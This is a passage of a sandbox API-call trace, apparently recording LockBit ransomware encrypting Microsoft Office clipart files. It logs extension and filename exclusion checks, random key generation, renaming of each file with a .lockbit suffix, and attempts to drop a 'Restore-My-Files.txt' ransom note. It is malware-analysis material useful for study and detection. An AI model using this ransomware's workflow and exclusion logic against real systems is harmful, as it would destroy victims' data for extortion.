lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.238] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.238] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0148.239] free (_Block=0x1fa2ed8) [0148.239] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.239] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.239] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3040, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187829.WMF", cAlternateFileName="")) returned 1 [0148.239] lstrcmpiW (lpString1=".", lpString2="J0187829.WMF") returned -1 [0148.240] lstrcmpiW (lpString1="..", lpString2="J0187829.WMF") returned -1 [0148.240] PathFindExtensionW (pszPath="J0187829.WMF") returned=".WMF" [0148.240] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.240] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.241] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.241] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187829.WMF") returned 1 [0148.241] lstrcmpiW (lpString1="ntldr", lpString2="J0187829.WMF") returned 1 [0148.242] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187829.WMF") returned 1 [0148.242] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187829.WMF") returned -1 [0148.242] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187829.WMF") returned -1 [0148.242] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187829.WMF") returned 1 [0148.242] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187829.WMF") returned -1 [0148.242] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.242] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF") returned=".WMF" [0148.242] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.242] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.242] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.243] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.243] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.243] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.243] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.243] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF.lockbit") returned 72 [0148.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187829.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.244] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.244] malloc (_Size=0x40068) returned 0x3df0008 [0148.244] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12352) returned 1 [0148.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.245] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.249] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.249] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.251] free (_Block=0x1fa2ed8) [0148.251] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.251] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.251] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2480, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187835.WMF", cAlternateFileName="")) returned 1 [0148.251] lstrcmpiW (lpString1=".", lpString2="J0187835.WMF") returned -1 [0148.251] lstrcmpiW (lpString1="..", lpString2="J0187835.WMF") returned -1 [0148.251] PathFindExtensionW (pszPath="J0187835.WMF") returned=".WMF" [0148.251] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.251] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.251] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.251] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.251] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.251] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.251] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.252] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.252] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187835.WMF") returned 1 [0148.253] lstrcmpiW (lpString1="ntldr", lpString2="J0187835.WMF") returned 1 [0148.253] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187835.WMF") returned 1 [0148.253] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187835.WMF") returned -1 [0148.253] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187835.WMF") returned -1 [0148.253] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187835.WMF") returned 1 [0148.253] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187835.WMF") returned -1 [0148.253] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.253] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF") returned=".WMF" [0148.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.253] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.254] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.254] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF.lockbit") returned 72 [0148.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187835.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.255] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.255] malloc (_Size=0x40068) returned 0x3df0008 [0148.255] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9344) returned 1 [0148.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.256] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.260] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.260] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.262] free (_Block=0x1fa2ed8) [0148.262] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.262] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.262] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3fe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187837.WMF", cAlternateFileName="")) returned 1 [0148.262] lstrcmpiW (lpString1=".", lpString2="J0187837.WMF") returned -1 [0148.262] lstrcmpiW (lpString1="..", lpString2="J0187837.WMF") returned -1 [0148.262] PathFindExtensionW (pszPath="J0187837.WMF") returned=".WMF" [0148.262] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.262] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.263] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.263] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187837.WMF") returned 1 [0148.264] lstrcmpiW (lpString1="ntldr", lpString2="J0187837.WMF") returned 1 [0148.264] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187837.WMF") returned 1 [0148.264] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187837.WMF") returned -1 [0148.264] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187837.WMF") returned -1 [0148.264] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187837.WMF") returned 1 [0148.264] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187837.WMF") returned -1 [0148.264] PathAddBackslashW (in: pszPath="C:\\\\Program 